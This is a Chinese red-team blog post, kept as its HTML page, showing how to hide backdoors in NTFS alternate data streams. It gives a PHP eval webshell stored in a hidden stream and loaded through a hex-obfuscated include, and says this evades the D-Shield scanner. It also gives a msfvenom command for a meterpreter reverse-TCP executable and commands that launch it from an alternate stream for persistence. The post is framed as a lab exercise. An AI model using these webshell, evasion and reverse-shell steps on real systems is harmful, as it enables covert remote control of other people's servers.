<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>ADS隐藏后门 | Patrilic's blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">ADS隐藏后门</h1><a id="logo" href="/.">Patrilic's blog</a><p class="description">不忘初心</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/2019/04/01/Hello/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">ADS隐藏后门</h1><div class="post-meta">Apr 18, 2019<span> | </span><span class="category"><a href="/categories/Red-Team-Tricks/">Red-Team Tricks</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> 阅读</span></span></div><a class="disqus-comment-count" data-disqus-identifier="2019/04/18/ADS 隐藏后门/" href="/2019/04/18/ADS 隐藏后门/#disqus_thread"></a><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ADS"><span class="toc-number">1.</span> <span class="toc-text">ADS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webshell（过D盾）"><span class="toc-number">2.</span> <span class="toc-text">Webshell（过D盾）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#测试"><span class="toc-number">3.</span> <span class="toc-text">测试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-环境"><span class="toc-number">3.1.</span> <span class="toc-text">0x01 环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-生成shell"><span class="toc-number">3.2.</span> <span class="toc-text">0x02 生成shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-植入后门"><span class="toc-number">3.3.</span> <span class="toc-text">0x03 植入后门</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Thanks"><span class="toc-number">4.</span> <span class="toc-text">Thanks</span></a></li></ol></div></div><div class="post-content"><blockquote>
<p>@Author: Patrilic<br>@Time: 2019-04-18 11:20:33<br><img src="/wallpaper/[32534]r-63888719.jpg" alt><br>高铁上没事干，把以前的笔记总结一下<br>[toc]</p>
</blockquote>
<h2 id="ADS"><a href="#ADS" class="headerlink" title="ADS"></a>ADS</h2><p>NTFS交换数据流（alternate data streams，简称ADS）</p>
<p>ADS是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流，就是说除了主文件流之外还可以有许多非主文件流寄宿在主文件流中。它使用资源派生来维持与文件相关的信息，虽然我们无法看到数据流文件，但是它却是真实存在于我们的系统中的。创建一个数据交换流文件的方法很简单，命令为”宿主文件:准备与宿主文件关联的数据流文件”。 —– baike.baidu.com</p>
<p>文件命名：</p>
<blockquote>
<p>ads.txt  普通txt文件 (主文件)<br>ads.txt:nop.txt （寄宿文件）</p>
</blockquote>
<p><img src="/ADS 隐藏后门.resources/8C8EB255-7B79-4D1A-A316-5DE2363EBBFD.png" alt="1bb96e55543dbb1493165cec47afc7af"><br>使用<strong>dir</strong>命令不能看到，必须使用<strong>dir /r</strong></p>
<p><img src="/ADS 隐藏后门.resources/A87A52A9-85B3-4001-B520-699A9ED67E9C.png" alt="d3973b4bd310ff1bd21deb5db2873e18"></p>
<h2 id="Webshell（过D盾）"><a href="#Webshell（过D盾）" class="headerlink" title="Webshell（过D盾）"></a>Webshell（过D盾）</h2><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">C:\<span class="title">phpStudy</span>\<span class="title">PHPTutorial</span>\<span class="title">WWW</span>\<span class="title">webshell</span>&gt;<span class="title">echo</span> "&lt;?<span class="title">php</span> <span class="title">phpinfo</span>();?&gt;" &gt; <span class="title">index.php:s</span>.<span class="title">txt</span></span></span><br></pre></td></tr></table></figure>
<p><img src="/ADS 隐藏后门.resources/C4AC74E5-DDB5-4C32-A202-1E55FC5FA815.png" alt="b2ed2bf9d1766135d674e36ab42aa1ac"><br><img src="/ADS 隐藏后门.resources/762C93D1-3F06-4970-B734-B85E9F18AEC0.png" alt="f40f0ed3186d78429c5000521b823e72"></p>
<p>将 小马写入index.php:s.txt中 ，然后再index.php中include<br>D盾不能获取非主文件流<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">index.php</span><br><span class="line"></span><br><span class="line">&lt;?php </span><br><span class="line">    $a=&quot;696e6465782e70&quot;.&quot;68703a732e747874&quot;;</span><br><span class="line">    $b=&quot;a&quot;;</span><br><span class="line">    include(PACK(&apos;H*&apos;,$$b))</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">index.php:s.txt</span><br><span class="line"></span><br><span class="line">&lt;?php @eval($_POST[&apos;chopper&apos;]);?&gt;</span><br></pre></td></tr></table></figure>
<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><h3 id="0x01-环境"><a href="#0x01-环境" class="headerlink" title="0x01 环境"></a>0x01 环境</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">MacOS             ipaddress: <span class="number">192</span>.<span class="number">168</span>.<span class="number">43</span>.<span class="number">223</span></span><br><span class="line">Windows <span class="number">10</span>        ipaddress: <span class="number">192</span>.<span class="number">168</span>.<span class="number">121</span>.<span class="number">132</span></span><br></pre></td></tr></table></figure>
<h3 id="0x02-生成shell"><a href="#0x02-生成shell" class="headerlink" title="0x02 生成shell"></a>0x02 生成shell</h3><figure class="highlight zsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=8888 -f exe -o shell.exe</span><br></pre></td></tr></table></figure>
<h3 id="0x03-植入后门"><a href="#0x03-植入后门" class="headerlink" title="0x03 植入后门"></a>0x03 植入后门</h3><p>环境描述：拿到了webshell，经过提权，权限为本地管理员<br>上传一个后门文件<br><img src="/ADS 隐藏后门.resources/3F4E2390-E7EA-49F4-B362-DC1A776E1262.png" alt="f0f797666014d4cb4f91d9e3e1a1e0ad"></p>
<p>使用<strong>type</strong>将shell.exe数据写入依附在hello.txt上<br><img src="/ADS 隐藏后门.resources/B3021D0D-E210-4E2E-99CD-E6BD839F0903.png" alt="99090aa172deaf9fe4ef2215b14b5e34"></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mklink "c:\backdoor\link.exe" "c:\backdoor\hello.txt:shell.exe"</span><br></pre></td></tr></table></figure>
<p>server 2k3后不能直接执行exe，必须建立链接<br><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">start</span> link.exe /b</span><br></pre></td></tr></table></figure></p>
<p><img src="/ADS 隐藏后门.resources/5B9ED225-B4D9-4EFA-A8C5-8A64621A194B.png" alt="f2eae722d0632ce91a23eeeafa1d079a"></p>
<p>成功回弹session</p>
<h2 id="Thanks"><a href="#Thanks" class="headerlink" title="Thanks"></a>Thanks</h2><p><a href="https://docs.microsoft.com/en-us/previous-versions/ms854468(v=msdn.10)" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/previous-versions/ms854468(v=msdn.10)</a><br><a href="https://klionsec.github.io/2017/11/13/ntfs-streams/" target="_blank" rel="noopener">https://klionsec.github.io/2017/11/13/ntfs-streams/</a><br><a href="https://blog.csdn.net/migee/article/details/56028011" target="_blank" rel="noopener">https://blog.csdn.net/migee/article/details/56028011</a><br><a href="https://blog.csdn.net/xiaoxuetu_/article/details/77318670" target="_blank" rel="noopener">https://blog.csdn.net/xiaoxuetu_/article/details/77318670</a></p>
</div><div class="tags"><a href="/tags/Backdoor/">Backdoor</a></div><div class="post-nav"><a class="pre" href="/2019/04/23/第十二届全国大学生信息安全竞赛初赛Write up/">第十二届全国大学生信息安全竞赛初赛部分Web Write up</a><a class="next" href="/2019/04/14/MySQL Injection/">MySQL Injection Tricks</a></div><div id="disqus_thread"><div class="btn_click_load"><button class="disqus_click_btn">阅读评论（请确保 Disqus 可以正常加载）</button></div><script type="text/javascript">var disqus_config = function () {
    this.page.url = 'http://patrilic.top/2019/04/18/ADS 隐藏后门/';
    this.page.identifier = '2019/04/18/ADS 隐藏后门/';
    this.page.title = 'ADS隐藏后门';
  };</script><script type="text/javascript" id="disqus-lazy-load-script">$.ajax({
url: 'https://disqus.com/next/config.json',
timeout: 2500,
type: 'GET',
success: function(){
  var d = document;
  var s = d.createElement('script');
  s.src = '//Patrilic.disqus.com/embed.js';
  s.setAttribute('data-timestamp', + new Date());
  (d.head || d.body).appendChild(s);
  $('.disqus_click_btn').css('display', 'none');
},
error: function() {
  $('.disqus_click_btn').css('display', 'block');
}
});</script><script type="text/javascript" id="disqus-click-load">$('.btn_click_load').click(() => {  //click to load comments
    (() => { // DON'T EDIT BELOW THIS LINE
        var d = document;
        var s = d.createElement('script');
        s.src = '//Patrilic.disqus.com/embed.js';
        s.setAttribute('data-timestamp', + new Date());
        (d.head || d.body).appendChild(s);
    })();
    $('.disqus_click_btn').css('display','none');
});</script><script type="text/javascript" id="disqus-count-script">$(function() {
     var xhr = new XMLHttpRequest();
     xhr.open('GET', '//disqus.com/next/config.json', true);
     xhr.timeout = 2500;
     xhr.onreadystatechange = function () {
       if (xhr.readyState === 4 && xhr.status === 200) {
         $('.post-meta .post-comments-count').show();
         var s = document.createElement('script');
         s.id = 'dsq-count-scr';
         s.src = 'https://Patrilic.disqus.com/count.js';
         s.async = true;
         (document.head || document.body).appendChild(s);
       }
     };
     xhr.ontimeout = function () { xhr.abort(); };
     xhr.send(null);
   });
</script></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="http://patrilic.top"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/ATT-CK/">ATT&CK</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/BypassUac/">BypassUac</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Diary/">Diary</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Red-Team-Tricks/">Red-Team Tricks</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQLi-Tricks/">SQLi Tricks</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Skills/">Skills</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Threat-Intelligence/">Threat Intelligence</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Write-up/">Write-up</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a><span class="category-list-count">6</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/SQL注入/" style="font-size: 15px;">SQL注入</a> <a href="/tags/Backdoor/" style="font-size: 15px;">Backdoor</a> <a href="/tags/Windows提权/" style="font-size: 15px;">Windows提权</a> <a href="/tags/DLL-Hijacking/" style="font-size: 15px;">DLL Hijacking</a> <a href="/tags/代码审计/" style="font-size: 15px;">代码审计</a> <a href="/tags/内网渗透/" style="font-size: 15px;">内网渗透</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/Struts2/" style="font-size: 15px;">Struts2</a> <a href="/tags/威胁情报/" style="font-size: 15px;">威胁情报</a> <a href="/tags/Git/" style="font-size: 15px;">Git</a> <a href="/tags/文件上传/" style="font-size: 15px;">文件上传</a> <a href="/tags/命令执行/" style="font-size: 15px;">命令执行</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://balis0ng.com" title="神仙学长balis0ng" target="_blank">神仙学长balis0ng</a><ul></ul><a href="https://evi1cg.me/" title="evi1cg's Blog" target="_blank">evi1cg's Blog</a><ul></ul><a href="http://hpdoger.cn" title="全寝室最sao的Hpdoger" target="_blank">全寝室最sao的Hpdoger</a><ul></ul><a href="http://0day.design" title="很多Q币的Passer6y" target="_blank">很多Q币的Passer6y</a><ul></ul><a href="http://adm1n.design" title="艺术家Hu3sky" target="_blank">艺术家Hu3sky</a><ul></ul><a href="https://0xa1paca.github.io" title="长发小哥0xa1paca" target="_blank">长发小哥0xa1paca</a><ul></ul><a href="http://noel.xin/" title="Noel's Blog" target="_blank">Noel's Blog</a><ul></ul><a href="https://www.0akarma.com" title="全能选手0aKarmA" target="_blank">全能选手0aKarmA</a><ul></ul><a href="https://www.cnblogs.com/H4lo" title="海大的IOT&amp;Pwn师傅H4lo" target="_blank">海大的IOT&amp;Pwn师傅H4lo</a><ul></ul><a href="https://www.kingkk.com/" title="Kingkk's Blog" target="_blank">Kingkk's Blog</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">Patrilic's blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body></html>